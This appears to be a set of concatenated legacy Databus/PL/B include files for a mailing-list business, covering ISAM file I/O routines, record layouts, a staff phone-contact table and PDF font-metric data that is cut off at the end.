; RETURNED    : ord7VARS record
; DESCRIPTION : EXACT ISAM KEY READ
;
nord7KEY
BRANCH nord7FLAG OF nord71
CALL nord7OPEN
nord71 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR71L,NOR71R,NOR71N
NOR71L FILEPI 1;nord7FILE
READ nord7FILE,nord7FLD;ord7VARS
TRAPCLR IO
RETURN
NOR71R
READLK nord7FILE,nord7FLD;ord7VARS
TRAPCLR IO
RETURN
NOR71N
READ nord7FILE,nord7FLD;ord7VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7TST
; REQUIRED : nord7FLD
; RETURNED :
; DESCRIPTION : TEST KEY (key lookup only; record data discarded via ";;")
;
nord7TST BRANCH nord7FLAG TO nord72
CALL nord7OPEN
nord72 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR72L,NOR72R,NOR72N
NOR72L FILEPI 1;nord7FILE
READ nord7FILE,nord7FLD;;
TRAPCLR IO
RETURN
NOR72R
READLK nord7FILE,nord7FLD;;
TRAPCLR IO
RETURN
NOR72N
READ nord7FILE,nord7FLD;;
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7KS
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
;
nord7KS BRANCH nord7FLAG TO nord73
CALL nord7OPEN
nord73 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR73L,NOR73R,NOR73N
NOR73L FILEPI 1;nord7FILE
READKS nord7FILE;ord7VARS
TRAPCLR IO
RETURN
NOR73R
READKSLK nord7FILE;ord7VARS
TRAPCLR IO
RETURN
NOR73N
READKS nord7FILE;ord7VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7SEQ
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
; APPLICATION'S RESPONSIBILITY TO TEST FLAGS
;
nord7SEQ BRANCH nord7FLAG TO nord74
CALL nord7OPEN
nord74 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR74L,NOR74R,NOR74N
NOR74L FILEPI 1;nord7FILE
READ nord7FILE,SEQ;ord7VARS
TRAPCLR IO
RETURN
NOR74R
READLK nord7FILE,SEQ;ord7VARS
TRAPCLR IO
RETURN
NOR74N
READ nord7FILE,SEQ;ord7VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7WRT
; REQUIRED : 'nord7FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
;               (writes always run under FILEPI; nord7lock not consulted)
;
nord7WRT BRANCH nord7FLAG TO nord75
CALL nord7OPEN
nord75 TRAP IOMssg Giving Error if IO
FILEPI 1;nord7FILE
WRITE nord7FILE,nord7FLD;ord7VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7UPD
; REQUIRED : A PREVIOUS KEY READ
; RETURNED :
; DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
;
nord7UPD BRANCH nord7FLAG TO nord76
CALL nord7OPEN
nord76 TRAP IOMssg Giving Error if IO
FILEPI 1;nord7FILE
UPDATE nord7FILE;ord7VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7DEL
; REQUIRED : 'nord7FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
;
nord7DEL BRANCH nord7FLAG TO nord77
CALL nord7OPEN
nord77 TRAP IOMssg Giving Error if IO
FILEPI 1;nord7FILE
DELETE nord7FILE,nord7FLD
trapclr IO
RETURN
;...............................................................................
;
; ENTRY POINT : nord7OPEN
; REQUIRED : 'nord7FLAG'
; RETURNED : 'nord7FLAG' SET TO '1' IF OPENED
; DESCRIPTION : OPEN NIN RECORD NUMBER FILE
; DISPLAY ERROR AND ABORT IF NOT ON-LINE.
;
nord7OPEN TRAP nord7GONE IF IO
OPEN nord7FILE,nord7NAME
TRAPCLR IO
MOVE C1 TO nord7FLAG
RETURN
;
; File missing/off-line: hand the name to the shared FILEGONE abort routine.
nord7GONE MOVE nord7NAME TO FILENAME
CALL FILEGONE
;
;.............................................................................
<file_sep>/include/NACDDD.inc
. .............................................................................
. VARIABLE DATA DEFINITIONS FOR NINACD/TXT.
. .........................................
.patch 2.01 DLH 05Nov2003
.patch 2.0 DLH Apr99 3 byte key/code
. ISAM handle for NINACD: 3-byte numeric key, 65-byte fixed records.
NACDFILE IFILE KEYLEN=3,FIXED=65
NACDNAME INIT "NINACD|NINS1:502 "
. NACDFLAG: nonzero once the file has been opened; NACDFLD: key work area.
NACDFLAG FORM 1
NACDFLD DIM 3
.
. Record layout (positions are 1-based within the 65-byte record).
NacdVars List
NACDKEY DIM 3 1-3 000-999.
NACDTEXT DIM 35 4-38 FREE FORM TEXT.
;begin patch 2.01
NacdFILL1 Dim 5 39-43 Not used (reserved to expand text)
NacdType Dim 1 44-44 ' ' = special, 'm' = per thousand 'f' = flat
NacdFill2 Dim 21 45-65
;NACDFILL DIM 27 39-65 NOT USED.
Listend
;end patch 2.01
.
..............................................................................
<file_sep>/include/NMLDDD.INC
......................................
.NMLDDD INCLUSION
.NINMLD file for Tracking changes in Mail Dates in NINORD
.
.FILE NAME: NINMLD
.REC LENGTH: 58 FIXED
.INDEX KEY: (1) 1-6 (LR#)
. 7-22 (Timestamp)
.
.AAMDEX KEY: (1) 1-6 (LR#)
; PATCH 1.1 DMB 18JUN2005 Changed IP of File Manager
.
.>Patch 1.1 Begin
.NMLDNAME INIT "NINMLD.ISI|20.20.30.103:502"
. NINMLD audit file: one record per Mail-Date change made in NINORD,
. ISAM-keyed by LR# + change timestamp (22 bytes); AAM keyed by LR# only.
NMLDNAME INIT "NINMLD.ISI|NINS1:502"
.
NMLDFLIST FILELIST
.NMLDFILE IFILE KEYLEN=22,FIXED=58,Name="NINMLD.ISI|20.20.30.103:502"
NMLDFILE IFILE KEYLEN=22,FIXED=58,Name="NINMLD.ISI|NINS1:502"
.NMLDFLE2 AFILE FIXED=58,Name="NINMLD.AAM|20.20.30.103:502"
NMLDFLE2 AFILE FIXED=58,Name="NINMLD.AAM|NINS1:502"
FILELISTEND
.>Patch 1.1 End
.
. NMLDFLD = full 22-byte key, NMLDFLD1 = short key work area.
. NOTE(review): NMLDLOCK presumably follows the same 1=FILEPI/2=record
. lock/3=none convention used by NDATLOCK - confirm against callers.
NMLDFLD DIM 22
NMLDFLD1 DIM 9
NMLDFLAG FORM 1
NMLDPATH FORM 1
NMLDLOCK FORM 1
.
NMLDVARS list
NMLDLR DIM 6 001-006 LR from NINORD (ISI/AAM)
NMLDTIME DIM 16 007-022 Timestamp MailDate was changed from NMLDDATE to it's new value (ISI)
NMLDDATE DIM 8 023-030 Last MailDate prior to change
NMLDINIT DIM 3 031-033 Initials of USER who made this change
NMLDFILL DIM 25 034-058 Filler
listend
<file_sep>/include/M2NLOdd.inc
.* MIN 2 NIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NINLO
. LENGTH: Fixed
. COMPRESS: NONE
. TYPE: Isam fixed
......................................................
. LAST MODIFIED
. patch 1.0 20 November 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDCTXTDD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
.M2nLodd - list owner xref
......................................................
. MIN-to-NIN list-owner cross reference: two ISAM paths over the same
. 13-byte records (by MIN owner code and by NIN owner number).
M2NLONAME INit "Min2NinLO "
M2nLOFlist Filelist
M2NLOFILE IFILE Name="Min2ninLo.Isi|NINS1:502"
M2NLOFILE2 IFILE Name="Min2ninLo2.Isi|NINS1:502"
FileListEnd
M2NLOFLAG FORM 1
M2NLOPATH FORM 1
M2NLOFld Dim 6
M2NLOFld2 Dim 6
.
. NOTE(review): the description below says "5 byte owner code" but the
. field is declared as 6 bytes (right justified) - confirm intent.
M2NLOVARS LIST .
M2NLOMin Dim 6 1-6 right justified 5 byte owner code
M2NLOFill1 dim 1 7-7 Not USed
M2NLONIN DIM 6 8-13 Owner #
ListEnd
<file_sep>/include/ndatdd.inc
******************************************************
* DATACARD FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER DATACARD FILE.
* ****************************************************
.
. FILE: NINDAT
. LENGTH: 600
. COMPRESS: NONE
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
.AIMDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
. 14-19 DATFUL
. 1-1 STATUS
. 32-32 NEW BYTE
. 33-33 EXCLUSIVE BYTE
.Begin patch 1.83
. 8-13 List owner
. 14-19 Service B.
.end patch 1.83
......................................................
. LAST MODIFIED
.patch 1.83 2014 July add owner and SB as aam keys
.patch 1.82 2014 July add flags counts,blocked dates,gender
.patch 1.81 2014 April add LRA month day of renewal
.patch 1.8 2013 Oct 18 track if LRA required
.Patch 1.7 28August2012 DLH - add Ifile Nindat5 key=list # only if elstcde <> " "
.Patch 1.6 23Feb2009 DLH - List clearance delivery preference " " = none use presence of fax/email to determine '1'=fax, '2'=email
. Note if ' ' and email address is present that is the default
. patch 1.5 30May2008 DLH - Quick reco file for WEb
. patch 1.4 12September2006 DLH - Fulfillment & Min Changes
. patch 1.3 29JUNE2006 DMS - Add search, as per 6/12/2006 CTF Meeting
. patch 1.2 21JUNE2006 ASH - Added aamdex for Fulfillment Number
. - 06Jul04 DLH Added NDatLUsage
. - 29Jul02 ASH Began conversion Process
.Secondary FIles See
. include ntxtdd.inc - DATACARD TEXT FILE
. include nadddd.inc - address codes
. include narrdd.inc - Arrangement codes
. include ncatdd.inc - CATEGORY FILE DESCRIPTOR.
. include NSLTdd.inc - SELECTION CODE FILE DESCRIPTOR.
. include nsrcdd.inc - SOURCE CODE FILE DESCRIPTOR.
. include nmoddd.inc - PRICE MODIFIER FILE DESCRIPTOR.
. include nusedd.inc - VARIaBLES MODULE FOR DATABUS PORT/USER IDENTIFICATION.
. INclude NMDCMsc.inc - additional info (currently from MIN) need to incorporate
. INClude NMDCCAT.inc - Min Category
.begin patch 1.5
. INclude NQRCdd.inc - quick reco for web
.end patch 1.5
.
. - 18JUN2005 DMB IP Address changed for File Manager
. - 06Apr2005 ASH Modifed COMMPER
. - 15Nov95 DLH add key by name
. - 12/10/85 ADDED ONE BYTE TO EACH CATEGORY CODE, DELETED
. BLANK8. RECORD SIZE NOW VARIABLE TO MAX 2813.
......................................................
. File-name work area plus the four physical access paths to the
. NINDAT datacard master (see FILELIST below):
.   NDATFILE - ISAM by 6-byte list number
.   NDATFLE2 - AAM (associative) index
.   NDATFLE3 - ISAM by 75-byte master list name (NINDAT4)
.   NDATFLE4 - ISAM by list number, managed lists only (NINDAT5)
NDATNAME DIM 35
NDATNME1 INIT "NINDAT|NINS1:502 "
NDATNME2 INIT "NINDAT|NINS1:502 "
NDATNME3 INIT "NINDAT4|NINS1:502 " nindat3 is used for tdmc info (argh)
NdatNME4 Init "NINDAT5|NINS1:502 " (argh) see above only Manage files
NDATFLIST FILELIST
NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|NINS1:502"
NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|NINS1:502"
NDATFLE3 IFILE KEYLEN=75,FIXED=600,Name="NINDAT4.ISI|NINS1:502"
NDATFLE4 Ifile KEYLEN=6,FIXED=600,Name="NINDAT5.ISI|NINS1:502" .only Managed lists
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|20.20.30.103:502"
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI"
.NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI|20.20.30.103:502"
.NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|20.20.30.103:502"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM"
FILELISTEND
NDATLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
. Key work areas sized for the various index keys above.
NDATFLD DIM 6
NDATFLD1 DIM 9
NDATFLD2 DIM 78
NDATFLD3 DIM 75
.START PATCH 1.2 ADDED LOGIC
NDATFLD4 DIM 9
.END PATCH 1.2 ADDED LOGIC
.START PATCH 1.3 ADDED LOGIC
NDATFLD5 DIM 4
NDATFLD6 DIM 4
.Begin patch 1.83
.NDATFLD7 DIM 4
.END PATCH 1.3 ADDED LOGIC
NDATFLD7 DIM 9
NDATFLD8 DIM 9
.end patch 1.83
NDATFLAG FORM 1
NDATPATH FORM 1
.
. Record layout for the 600-byte fixed NINDAT datacard master.
. Positions are 1-based byte ranges within the record.
DATVARS LIST
STATUS DIM 1 1-1 'W' FOR WITHDRAWN.
LSTNUM DIM 6 2-7 ZERO FILLED KEY.
OWNNUM DIM 6 8-13 OWNER NUMBER (KEY FOR NINOWN FILES)
DATFUL DIM 6 14-19 FULFILLMENT NUMBER
DATMAN DIM 6 20-25 MANAGER
DATMLR DIM 6 26-31 MAILER THIS WOULD NEGATE THE NEED FOR NINXRF.DAT!!!!!!!!!!
NLSTCDE DIM 1 32-32 NEW LIST CODE (Y or N).
ELSTCDE DIM 1 33-33 Management CODE (N, C, P, or ).
. 'N' = NEW YORK, 'C'=CALIFORNIA, 'P'=Pacific Lists, ' ' NOT Managed in house
OLDCOMMPER DIM 3 34-36 COMMISSION. OBSOLETE FOR ALL NEWLY COMPILED PROGRAMS AS OF 4/6/2005
HOTLINE DIM 1 37-37 HOTLINE CODE (Y or N).
NEWDATE DIM 8 38-45 DATE CARD PUT UP CCYYMMDD FORMAT
REVDATE DIM 8 46-53 REVISION DATE CCYYMMDD FORMAT - PRINTED ON DATACARD data update date
PASSWORD DIM 10 54-63 WHOM LAST UPDATED CARD - PRINTED ON DATACARD
MLSTNAME DIM 75 64-138 MASTER LIST NAME.
OLSTNAME DIM 35 139-173 ORDER LIST NAME.
CLEANCDE DIM 4 174-177 CLEANED CODE (Cxxx).
CLNINFO DIM 38 178-215 CLEAN INFORMATION.
NETNAME DIM 4 216-219 NET NAME CODE (Nxxx).
NETINFO DIM 38 220-257 NET NAME INFORMATION.
DELCODE DIM 4 258-261 DELIVERY CODE (Dxxx).
SAMPLE DIM 4 262-265 SAMPLE CODE (Pxxx).
SEX DIM 15 266-280 SEX TEXT. OFF 1 BYTE
MIN DIM 11 281-291 MINIMUM TEXT.
UNIVERSE DIM 10 292-301 UNIVERSE QUANTITY.
DATPAY DIM 6 302-307 PAY-TO NUMBER.
NDATCONV DIM 1 308-308 CONVERSION BYTE
NDATEXCH DIM 1 309-309 1 = EITHER, 2 = EXCHANGE ONLY, 3 = RENTAL ONLY -- OBSOLETE!!! USING BYTE IN NINSEL INSTEAD
UNITDATA DIM 188 310-497
NDATWEB DIM 1 498-498 ' ' =ALLOWED ON WEBSITE 1=Do not post
NDATOFF DIM 1 499-499 1=OFFICE USE ONLY
NDATUPDDATE DIM 8 500-507 UPDATE DATE touched date
NDATUPDINIT DIM 10 508-517 UPDATE INITS
NDATBUSY DIM 1 518-518
NDatLUSAGE DIM 1 519-519 ; 'F' If we cannot share list usage info
COMMPER DIM 6 520-525 COMMISSION.
NDATVerf Dim 8 526-533 Date info last confirmed data
NDATNUPD Dim 8 534-541
NdatMen form 3.2 542-547 percent men
NdatFem Form 3.2 548-553 percent female
NdatOldOwn Dim 6 554-559 Holds old manager / owner number if change occured
.begin patch 1.6
NDatLCFlag Dim 1 560-560 how to send lcr's " " use presence of email/fax# 1=fax, 2 = email
.begin patch 1.8
.NDatFill Dim 40 561-600
NDATLRA Dim 1 561-561
.begin patch 1.81
NDatLRADte Dim 2 562-563 .month of renewal
.begin patch 1.82
ndatFlag1 Dim 1 564-564 .y=blocked dates
ndatflag2 dim 1 565-565 .y=Gender
Ndatflag3 dim 1 566-566 .y=counts
Ndatflag4 dim 1 567-567 .y=mailer restrictions
NDatFill Dim 33 568-600
.NDatFill Dim 37 564-600
.NDatFill Dim 39 562-600
.end patch 1.81
.end patch 1.8
.end patch 1.6
.NDatFill Dim 41 560-600
.NDATFILL DIM 47 553-600 FILLER
.Eventually add following 2 fields:
. Verification Date - Data that List Owner last verified our datacard info
. Verification Schedule - Time frame when we start pestering List Owner about verifying our info.
LISTEND
<file_sep>/include/NSTEIO.INC
..............................................................................
.
. NSTEIO INCLUSION
. NIN STATEMENT FILE IO ROUTINES
.
. FILE NAME : NINSTE
. REC LENGTH: 122
. INDEX KEY :
.
..............................................................................
.
. ENTRY POINT : NSTESEQ
. REQUIRED :
. RETURNED : STATEMENT RECORD
. DESCRIPTION : SEQUENTIAL READ
.
. Sequential reader: opens NINSTE on first use, then reads the next
. record under FILEPI into STEvars.
. NOTE(review): no IO trap is set around the READ; on end-of-file the
. OVER condition is left for the caller to test (cf. NORD6SEQ).
NSTESEQ BRANCH NSTEFLAG TO NSTE3
CALL NSTEOPEN
NSTE3 FILEPI 1;NSTEFILE
READ NSTEFILE,SEQ;STEvars
RETURN
..............................................................................
.
. ENTRY POINT : NSTEOPEN
. REQUIRED : 'NSTEFLAG'
. RETURNED : 'NSTEFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN STATEMENT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NSTEOPEN TRAP NSTEGONE IF IO
OPEN NSTEFILE,NSTENAME
TRAPCLR IO
MOVE C1 TO NSTEFLAG
RETURN
. File missing/off-line: hand the name to the shared FILEGONE abort routine.
NSTEGONE MOVE NSTENAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/Contact1.inc
; Last change: JS 3 Feb 2000 2:54 pm
. .............................................................................
.CONTACT1/INC
. .CONTACT TABLE USED FOR DISPLAY AND PRINT PROGRAMS
.
OCNT DIM 40
OCNT0 INIT "Billing(415) 291-5621"
OCNT1 INIT "<NAME>(415) 291-5637"
OCNT2 INIT "<NAME>(415) 291-5665"
.OCNT2 INIT "jennifer ost" left 9/92
.OCNT2 INIT "<NAME>"
.OCNT3 INIT "<NAME>"
OCNT3 INIT "<NAME>(415) 291-5656"
.OCNT4 INIT "<NAME>"
.OCNT4 INIT "<NAME>"
.OCNT4 INIT "<NAME>" 1/8/92
.OCNT4 INIT "stacey white" 3/2/93
OCNT4 INIT "<NAME>(415) 291-5644"
.OCNT4 INIT "<NAME>" 5/93
OCNT5 INIT "<NAME>(415) 291-5669"
.OCNT5 INIT "<NAME>(415) 291-5669"
.OCNT5 INIT "jennifer post"
.OCNT5 INIT "<NAME>"
.OCNT5 INIT "<NAME>"
.OCNT5 INIT "derek glass"
.OCNT6 INIT "<NAME>"
.OCNT6 INIT "<NAME>"
OCNT6 INIT "<NAME>(415) 291-5668"
.OCNT6 INIT "<NAME>(415) 291-5668" 11/10/97
.OCNT7 INIT "<NAME>"
.OCNT7 INIT "<NAME>(415) 291-5667" 12/98
.OCNT7 INIT "<NAME>(415) 291-5667" 01/10/2000
OCNT7 INIT "<NAME> (415) 291-5621"
.OCNT8 INIT "<NAME>"
.OCNT8 INIT "<NAME>"
.OCNT8 INIT "<NAME>"
.OCNT8 INIT "<NAME>(415) 291-5655" 4/1/98
.OCNT8 INIT "<NAME>(415) 291-5609"
OCNT8 INIT "<NAME>(415) 291-5609"
.OCNT9 INIT "elizabeth corsale"
OCNT9 INIT "Phoe<NAME>(415) 291-5667"
.OCNT9 INIT "<NAME>(415) 291-5638" 5/1/98
OCNT10 INIT "<NAME>(415) 291-5640"
.OCNT11 INIT "<NAME>"
.OCNT11 INIT "<NAME>"
.OCNT11 INIT "<NAME>" .4/28/94
.OCNT11 INIT "<NAME>" .7/19/94
.OCNT11 INIT "<NAME>(415) 291-5640"
.OCNT11 INIT "<NAME>(415) 291-5603"
OCNT11 INIT "<NAME>(415) 291-5647"
.OCNT12 INIT "<NAME>" cold calls
OCNT12 INIT "<NAME>(415) 291-5643"
.OCNT13 INIT "<NAME>"
.OCNT13 INIT "<NAME>"
.OCNT13 INIT "<NAME>" left sales 7/93.
.OCNT13 INIT "<NAME>"
.OCNT13 INIT "<NAME>(415) 291-5657" 5/31/98
OCNT13 INIT "<NAME>(415) 291-5657" 08/04/98
.OCNT14 INIT "<NAME>"
OCNT14 INIT "<NAME>(415) 291-5642"
.OCNT15 INIT "<NAME>"
OCNT15 INIT "<NAME>(415) 291-5663"
.OCNT15 INIT "<NAME>"
OCNT16 INIT "<NAME>(415) 291-5662"
OCNT17 INIT "<NAME>(415) 291-5658"
...............................................................................
.PROGRAMS ACCESSING THIS INCLUDE:
.
. NAME ACCESS TYPE
.*********** ********************************************
.NORD0001
.NORD002L
.NORD0009
.NORD0033
.NINV0001
.NINV0003
.NXCH0001
.********> END IF INCLUDE
<file_sep>/include/NMRGIO.INC
..............................................................................
.
. NMRGIO INCLUSION
. NIN MERGE FILE I/O ROUTINES
.
. FILE NAME : NINMERGE
. REC LENGTH: 277 COMPRESSED
. INDEX KEY : (1) 1-6 (LR#)
.DLH 08Feb2007 file server and filelist
..............................................................................
.
. ENTRY POINT : NMRGKEY
. REQUIRED : 'NMRGPATH', 'NMRGFLD'
. RETURNED : MERGE RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
. NOTE(review): unlike NORD6IO/NORD7IO, these routines set no IOMssg trap
. and consult no lock-mode variable - every path runs under FILEPI.  The
. headers mention 'NMRGPATH', but nothing in these routines reads it.
NMRGKEY BRANCH NMRGFLAG TO NMRG1
CALL NMRGOPEN
NMRG1 FILEPI 1;NMRGFILE
READ NMRGFILE,NMRGFLD;NMRGVAR
RETURN
..............................................................................
.
. ENTRY POINT : NMRGTST
. REQUIRED : NMRGFLD
. RETURNED :
. DESCRIPTION : TEST KEY (record data read into scratch STR1, not NMRGVAR)
.
NMRGTST BRANCH NMRGFLAG TO NMRG2
CALL NMRGOPEN
NMRG2 FILEPI 1;NMRGFILE
READ NMRGFILE,NMRGFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NMRGKS
. REQUIRED :
. RETURNED : MERGE RECORD
. DESCRIPTION : KEY SEQUENTIAL MERGE FILE READ
.
NMRGKS BRANCH NMRGFLAG TO NMRG3
CALL NMRGOPEN
NMRG3 FILEPI 1;NMRGFILE
READKS NMRGFILE;NMRGVAR
RETURN
..............................................................................
.
. ENTRY POINT : NMRGSEQ
. REQUIRED :
. RETURNED : MERGE RECORD
. DESCRIPTION : SEQUENTIAL MERGE FILE READ
.
NMRGSEQ BRANCH NMRGFLAG TO NMRG4
CALL NMRGOPEN
NMRG4 FILEPI 1;NMRGFILE
READ NMRGFILE,SEQ;NMRGVAR
RETURN
..............................................................................
.
. ENTRY POINT : NMRGWRT
. REQUIRED : 'NMRGFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT., ISI 2/3 INSERTS.
.
NMRGWRT BRANCH NMRGFLAG TO NMRG5
CALL NMRGOPEN
NMRG5 FILEPI 1;NMRGFILE
WRITE NMRGFILE,NMRGFLD;NMRGVAR
RETURN
.
..............................................................................
.
. ENTRY POINT : NMRGUPD
. REQUIRED : Previous Valid Read
. RETURNED :
. DESCRIPTION : Update record
.
NMRGUPD BRANCH NMRGFLAG TO NMRG6
CALL NMRGOPEN
NMRG6 FILEPI 1;NMRGFILE
Update NMRGFILE;NMRGVAR
RETURN
.
..............................................................................
.
. ENTRY POINT : NMRGDEL
. REQUIRED : 'NMRGFLD'
. RETURNED :
. DESCRIPTION : Deletes record and KEy
.
NMRGDEL BRANCH NMRGFLAG TO NMRG7
.
CALL NMRGOPEN
NMRG7 FILEPI 1;NMRGFILE
DELETE NMRGFILE,NMrgfld
RETURN
.
...............................................................................
.
. ENTRY POINT : NMRGOPEN
. REQUIRED :
. RETURNED : 'NMRGFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MERGE FILE.
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NMRGOPEN
TRAP NMRGGONE IF IO
OPEN NMRGFILE,NMRGNAME
TRAPCLR IO
MOVE C1 TO NMRGFLAG
RETURN
. File missing/off-line: hand the name to the shared FILEGONE abort routine.
NMRGGONE MOVE NMRGNAME TO FILENAME
CALL FILEGONE
.
...............................................................................
<file_sep>/DEVELOP/Includes - why/pdffmetrics.inc
. basic 14 font metrics data
.
. Names of the 14 standard (base-14) PDF Type1 fonts.  The three arrays
. below are parallel, indexed by fontIdx (1-14):
.   pdffonts    - font name
.   pdffontres  - page-resource number (/Fnn), 0 until first use
.   pdffontobj  - PDF object number of the emitted font dictionary
pdffonts dim 21(14),("Times-Roman"),("Times-Bold"),("Times-Italic"),("Times-BoldItalic"):
("Helvetica"),("Helvetica-Bold"),("Helvetica-Oblique"),("Helvetica-BoldOblique"):
("Courier"),("Courier-Bold"),("Courier-Oblique"),("Courier-BoldOblique"):
("Symbol"),("ZapfDingbats")
fontIdx form 2
.
pdffontres form 4(14)
pdffontobj form 4(14)
.
. Accumulated font-dictionary objects plus the current font selection
. strings used when writing page content / page resources.
fonts DIM ^2000 // just enough room for all 14 fonts...
CurrentFont dim 14 // page content tag
CurFontRes dim 20 // page dictionary resource
fontsize form 2
fontnum form 2
.
. Metrics of the CURRENTLY selected font, loaded from the MetricsA /
. AFM data; glyph widths are in 1/1000ths of the font size (glyph space).
FontMetrics RECORD
ulPos form 4.3 // underline pos in char metric
ulpen form 3.3 // underline pen size
Descender form 4.3
GlyphWidths form 5.3(256)
recordend
.
TimesMetric INIT "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,408,500,500,833,778,333,333,333,500,564,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,278,278,564,564,564,444,921,722,667,667,722,611,":
"556,722,722,333,389,722,611,889,722,722,556,722,667,556,611,722,722,944,722,":
"722,611,333,278,333,469,500,333,444,500,444,500,444,333,500,500,278,278,500,":
"278,778,500,500,500,500,333,389,278,500,500,722,500,500,444,480,200,480,541,":
"333,500,500,167,500,500,500,500,180,444,500,333,333,556,556,500,500,500,250,":
"453,350,333,444,444,500,1000,1000,444,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,889,276,611,722,889,310,667,278,278,500,722,500,0,0,0,0"
TimesBMetric init "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,555,500,500,1000,833,333,333,333,500,570,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,333,333,570,570,570,500,930,722,667,722,722,667,":
"611,778,778,389,500,778,667,944,722,778,611,778,722,556,667,722,722,1000,722,":
"722,667,333,278,333,581,500,333,500,556,444,556,444,333,500,556,278,333,556,":
"278,833,556,500,556,556,444,389,333,556,500,722,500,500,444,394,220,394,520,":
"333,500,500,167,500,500,500,500,278,500,500,333,333,556,556,500,500,500,250,":
"540,350,333,500,500,500,1000,1000,500,333,333,333,333,333,333,333,333,333,333,":
"333,333,333,1000,1000,300,667,778,1000,330,722,278,278,500,722,556,0,0,0,0"
TimesIMetric INIT "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,420,500,500,833,778,333,333,333,500,675,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,333,333,675,675,675,500,920,611,611,667,722,611,":
"611,722,722,333,444,667,556,833,667,722,611,722,611,500,556,722,611,833,611,":
"556,556,389,278,389,422,500,333,500,500,444,500,444,278,500,500,278,278,444,":
"278,722,500,500,500,500,389,389,278,500,444,667,444,444,389,400,275,400,541,":
"389,500,500,167,500,500,500,500,214,556,500,333,333,500,500,500,500,500,250,":
"523,350,333,556,556,500,889,1000,500,333,333,333,333,333,333,333,333,333,333,":
"333,333,333,889,889,276,556,722,944,310,667,278,278,500,667,500,0,0,0,0"
TimesBIMetric init "-100,50,-217,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,389,555,500,500,833,778,333,333,333,500,570,250,333,250,278,500,500,500,":
"500,500,500,500,500,500,500,333,333,570,570,570,500,832,667,667,667,722,667,":
"667,722,778,389,500,667,611,889,722,722,611,722,667,556,611,722,667,889,667,":
"611,611,333,278,333,570,500,333,500,500,444,500,444,333,500,556,278,278,500,":
"278,778,556,500,500,500,389,389,278,556,444,667,500,444,389,348,220,348,570,":
"389,500,500,167,500,500,500,500,278,500,500,333,333,556,556,500,500,500,250,":
"500,350,333,500,500,500,1000,1000,500,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,944,266,611,722,944,300,722,278,278,500,722,500,0,0,0,0"
HelveticaMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,278,355,556,556,889,667,222,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,278,278,584,584,584,556,1015,667,667,722,722,":
"667,611,778,722,278,500,667,556,833,722,778,667,778,722,667,611,722,667,944,":
"667,667,611,278,278,278,469,556,222,556,556,500,556,556,278,556,556,222,222,":
"500,222,833,556,556,556,556,333,500,278,556,500,722,500,500,500,334,260,334,":
"584,333,556,556,167,556,556,556,556,191,333,556,333,333,500,500,556,556,556,":
